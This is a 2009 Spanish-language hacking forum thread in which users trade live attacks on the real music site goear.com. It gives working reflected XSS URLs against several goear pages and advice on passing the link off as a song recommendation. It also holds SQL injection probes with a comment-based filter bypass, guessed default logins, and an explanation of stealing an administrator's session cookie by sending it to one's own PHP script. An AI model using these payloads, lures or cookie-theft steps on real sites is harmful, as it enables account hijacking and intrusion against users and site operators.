|
Título: xss en goear.com Publicado por: jdc en 8 Noviembre 2009, 20:49 pm Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬
Esta reportado 11/08/2009 El xss esta en la pagina donde se abre el reproductor portable... Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD por ejemplo tenemos una cancion cualquiera: http://www.goear.com/listenwin.php?v=78707c5 le agregamos nuestro codigo malo xD http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ;)')</script> Que en el navegador se vera: http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E y que podemos disfrazar en foros asi http://www.goear.com/listenwin.php?v=78707c5 (http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E) y decir "esta cancion es genial" No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin Saludos. PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬ Título: Re: xss en goear.com Publicado por: Castg! en 8 Noviembre 2009, 22:21 pm estaba buscando vulenrabilidad a goear cuando me vengoa l foro y ya postearon! xd!
Título: Re: xss en goear.com Publicado por: WHK en 8 Noviembre 2009, 22:45 pm genial!, lo agregaré al recopilarorio de advisories:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_301009-t244090.0.html Título: Re: xss en goear.com Publicado por: jdc en 9 Noviembre 2009, 01:58 am Ok gracias :) complemente la informacion en el post de SDC que no recordaba xD
http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265 Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden ********** EDITO: ********** El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas Código: green day"><script>alert('janito24')</script>Lo que te llevaria a: Código: http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E Título: Re: xss en goear.com Publicado por: YST en 9 Noviembre 2009, 02:17 am Agregale un SQLI :P
Código
Título: Re: xss en goear.com Publicado por: fede_cp en 9 Noviembre 2009, 04:37 am a ver si podemos sacar algo de aca, nose si servira de algo:
http://www.goear.com/listenwin.php?v=%22%3E1+/**/ordEr+/**/++By+10-- adios Título: Re: xss en goear.com Publicado por: YST en 9 Noviembre 2009, 05:30 am No se para que tanto desordern en el order tan solo con el /**/ te saltas el filtro :xD Lo malo es que el Select te lo jode :xD
Título: Re: xss en goear.com Publicado por: jdc en 9 Noviembre 2009, 06:46 am YST sería bueno que reportaras la sqli :)
Saludos y felicidades ;) Título: Re: xss en goear.com Publicado por: YST en 9 Noviembre 2009, 06:55 am YST sería bueno que reportaras la sqli :) Yo no reporto nada :xD Si alguien quiere reportarlo es libre :P Título: Re: xss en goear.com Publicado por: fede_cp en 9 Noviembre 2009, 22:15 pm en goear hay un bug, realemente importante, si quieren le publico y si no se puede por mp se los dire
saludos Título: Re: xss en goear.com Publicado por: jdc en 9 Noviembre 2009, 22:33 pm Cual es? Yo quiero saber :p
No creo que haya problemas, pero primero avísale a ellos ;) yo el xss lo encontré hace un par de meses, incluso se lo mostré a Carloswaldo, pero como los tipos tienen botada la página ayer lo publique xD Título: Re: xss en goear.com Publicado por: fede_cp en 9 Noviembre 2009, 22:40 pm bueno, el bug si lo leen los del staff, es un bug que afecta a los archivos que son subidos a goear, y por ende, es posible descargar el archivo .mp3.
ese es el bug, ahora si me dejan digo como :P, enicma es muy bobo saludos! Título: Re: xss en goear.com Publicado por: T0rete en 9 Noviembre 2009, 22:42 pm Medio mundo se descarga musica de goear, ¿nos vas a contar algo nuevo? :xD
Título: Re: xss en goear.com Publicado por: jdc en 9 Noviembre 2009, 22:49 pm Seee el archivo mp3 queda en los temporales... Pero no le cuentes a nadie xD youtube también tiene ese bug :xD
Título: Re: xss en goear.com Publicado por: fede_cp en 9 Noviembre 2009, 23:06 pm ok sabelotodo
porai alguien no lo sabia adio Título: Re: xss en goear.com Publicado por: jdc en 10 Noviembre 2009, 01:45 am Disculpa sólo bromeaba ;)
Título: Re: xss en goear.com Publicado por: Castg! en 10 Noviembre 2009, 02:31 am lo que fede dice es entrar directamente a la base de datos y descargar el archivo original *.mp3, no descomponer el flash genio.
Título: Re: xss en goear.com Publicado por: jdc en 10 Noviembre 2009, 03:29 am lo que fede dice es entrar directamente a la base de datos y descargar el archivo original *.mp3, no descomponer el flash genio. Lo se "genio" y tambien lo entiendo, ademas se puede usar como hosting de mp3 para poner en reproductores propios ;) Por ejemplo: http://www.goear.com/files/sst/mp3files/18072006/fd33fba0e00448176ef025f7b52c4be5.mp3 Saludos... "GENIO" Título: Re: xss en goear.com Publicado por: jdc en 10 Noviembre 2009, 03:58 am :xD Tambien tiene la vulnerabilidad SDC xDDDDDDDDD user: test pass: test jajajajaja no es bug pero es simpatico... muchas webs tienen a ese usuario registrado ¬¬ demasiadas
user:12345 pass: 12345 //////////// user: prueba pass: prueba ////////////// ¬¬ Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 04:10 am jeje aca estoy, no se peleen hey!
no importa janito, es que nose, porai alguien no lo sabia. es facil: ya fue ahora lo explico vas a goear desde el IE, esperas a que llege al 100%,despues vas a C:\Documents and Settings\usuario\Configuración local\Archivos temporales de Internet y ahi estara el archivo. si alguien quiere encontra alguna sqlI, en goear, mandenme el msnm que lo agrego y hablamos y nos fijamos. saludos! Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 04:16 am agrego un xss, más.lo obutbe a partir del titulo :xD:
http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E esta minado de xss! saludos! Título: Re: xss en goear.com Publicado por: jdc en 10 Noviembre 2009, 04:25 am agrego un xss, más.lo obutbe a partir del titulo :xD: http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E esta minado de xss! saludos! No te metas al login :silbar: ajajajajajaja Saludos ;) Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 04:34 am agrego un xss, más.lo obutbe a partir del titulo :xD: http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E esta minado de xss! saludos! No te metas al login :silbar: ajajajajajaja Saludos ;) saludos Título: Re: xss en goear.com Publicado por: YST en 10 Noviembre 2009, 04:38 am Pero lo de descargar el .mp3 no es un bug :xD
Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 04:39 am ESTA bbien!!. me equiboque! jajaj
saludos Título: Re: xss en goear.com Publicado por: YST en 10 Noviembre 2009, 15:59 pm ESTA bbien!!. me equiboque! jajaj Pero no me grites :¬¬saludos Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 16:03 pm jajaja
si quieren un bug: http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+33--++ http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+34--++ ahi si hay una sqlI lo que no pude hacer fue hacer el SELECT, tiene buenos filtros, no lo pude sacar ni poniendo maysuculas ni /**/, asique si alguien me ayuda mandenme el mail por mp asi lo hablamos saludos! Título: Re: xss en goear.com Publicado por: Castg! en 10 Noviembre 2009, 22:08 pm otro mas: http://www.goear.com/search.php?q=leonchalon&p=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22Holamundo%22%29%3C/script%3E (http://www.goear.com/search.php?q=leonchalon&p=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22Holamundo%22%29%3C/script%3E)
Título: Re: xss en goear.com Publicado por: Darioxhcx en 10 Noviembre 2009, 22:10 pm pobre goear ya le dieron vuelta la web completa.. falta un lfi y estamos jajaja..
Título: Re: xss en goear.com Publicado por: jdc en 10 Noviembre 2009, 22:36 pm Tiene todos los bugs conocidos xD me arrepiento de haber posteado esa web xD por lo menos ningún lammer le ha hecho un pwned xD
Título: Re: xss en goear.com Publicado por: fede_cp en 10 Noviembre 2009, 23:12 pm igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.
saludos, alguien se ocmunico con goear? Título: Re: xss en goear.com Publicado por: YST en 10 Noviembre 2009, 23:36 pm igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss. El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprendersesaludos, alguien se ocmunico con goear? Título: Re: xss en goear.com Publicado por: Castg! en 10 Noviembre 2009, 23:37 pm mi ingles es pesimo :¬¬
Citar Vulnerbility. hello, my name is tomás from argentina, my english is very bad. please sorry. we found much bugs in your web. you can see any bugs here: http://foro.elhacker.net/nivel_web/xss_en_goearcom-t273533.30.html. we think a web like a goear have much bugs. bye bye. Título: Re: xss en goear.com Publicado por: fede_cp en 11 Noviembre 2009, 00:49 am igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss. El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprendersesaludos, alguien se ocmunico con goear? claro, son las mas comunes, pero tambien encontre una sqlI :o saludos Título: Re: xss en goear.com Publicado por: YST en 11 Noviembre 2009, 02:35 am igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss. El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprendersesaludos, alguien se ocmunico con goear? claro, son las mas comunes, pero tambien encontre una sqlI :o saludos Título: Re: xss en goear.com Publicado por: fede_cp en 11 Noviembre 2009, 03:26 am igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss. El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprendersesaludos, alguien se ocmunico con goear? claro, son las mas comunes, pero tambien encontre una sqlI :o saludos osea yo hablaba de unos posts mas atras que presente, cuando saque las columnas, eso no lo habia puesto nadie. el tema ahroa igual no es peliar es descubrir mas fallas saludos Título: Re: xss en goear.com Publicado por: Darioxhcx en 11 Noviembre 2009, 04:04 am intentaron colar shell ?
no creo que se pueda , pero el no ya lo tenemos jajajja xD Título: Re: xss en goear.com Publicado por: jdc en 11 Noviembre 2009, 06:25 am Pobre webmaster... xD sí se le ocurre arreglar les aseguro que encontrará más cosas y bien feas.
PD: A modo de petición sí alguien tiene la oportunidad de defacear la página porfavor no lo haga. Al fin y al cabo es música gratis para todos :) Título: Re: xss en goear.com Publicado por: Castg! en 11 Noviembre 2009, 21:36 pm la cancion subida por el user test xD: (yo no fui) fue alguno de ustedes?: http://www.goear.com/listen/63f1eca/test-test (http://www.goear.com/listen/63f1eca/test-test)
Título: Re: xss en goear.com Publicado por: jdc en 11 Noviembre 2009, 21:42 pm la cancion subida por el user test xD: (yo no fui) fue alguno de ustedes?: http://www.goear.com/listen/63f1eca/test-test (http://www.goear.com/listen/63f1eca/test-test) Pense que seria un rickrolleo xDDDDDD Título: Re: xss en goear.com Publicado por: WHK en 11 Noviembre 2009, 21:52 pm No sean malos con esa web.
Citar Upload result File sent succesfully ;-). You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"> test2','test2\'"><h1>test2</textarea></div>fuck&' at line 1 Título: Re: xss en goear.com Publicado por: jdc en 11 Noviembre 2009, 21:56 pm Título: Re: xss en goear.com Publicado por: Joaquín^^ en 13 Diciembre 2009, 19:17 pm En el hipotetico caso que la otra persona abra el link de goear modificado que yo le paso desde su pc, que es lo que pasa o cual es el siguiente paso que debo hacer
Título: Re: xss en goear.com Publicado por: jdc en 14 Diciembre 2009, 01:33 am En el hipotetico caso que la otra persona abra el link de goear modificado que yo le paso desde su pc, que es lo que pasa o cual es el siguiente paso que debo hacer Hipoteticamente nada a menos que sea un administrador y en el eventualmente tenga algun sistema eventual de administracion que en alguna ocacion maneje cookies para el ingreso a esta. En ese caso hipotetico tendrias que enviarle tu nick y lograr robar su cookie a travez de alguna paginita pequeña escrita en php por ti :D Título: Re: xss en goear.com Publicado por: Joaquín^^ en 14 Diciembre 2009, 02:33 am Siento que hay algo en estas cosas que no me cierra
no entiendo nada.. Como llega la cookie hasta mi? Título: Re: xss en goear.com Publicado por: YST en 14 Diciembre 2009, 02:35 am Siento que hay algo en estas cosas que no me cierra no entiendo nada.. Como llega la cookie hasta mi? Te llega una carta a la casa con la cookie :¬¬ Tienes que hacer que se haga una peticion a un script tuyo pasandole la cookie que obtenga la coockie |